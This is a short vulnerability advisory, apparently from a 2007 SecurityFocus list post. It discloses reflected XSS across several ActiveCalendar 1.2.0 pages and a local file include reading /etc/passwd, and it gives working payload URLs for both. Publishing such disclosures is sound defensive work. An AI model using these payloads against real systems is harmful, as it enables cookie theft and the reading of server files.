ActiveCalendar 1.2.0, Multiple vulnerabilities Feb 24 2007 02:34AM
simon itsecurity gmail com
ActiveCalendar 1.2.0, Multiple vulnerabilities
Vendor site : http://www.micronetwork.de/activecalendar/
Global risk : Critical

Multiples XSS :
---------------

/activecalendar/data/[page].php?css="><script>alert(document.cookie)</sc
ript>

In :

/data/
flatevents.php
js.php
mysqlevents.php
m_2.php
m_3.php
m_4.php
xmlevents.php
y_2.php
y_3.php

Local File Include :
---------------------

/activecalendar/data/showcode.php?page=../../../../../../../../../../../
../../../etc/passwd%00

Regards,

Simon Bonnard - 24/02/07 - 02:40am

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus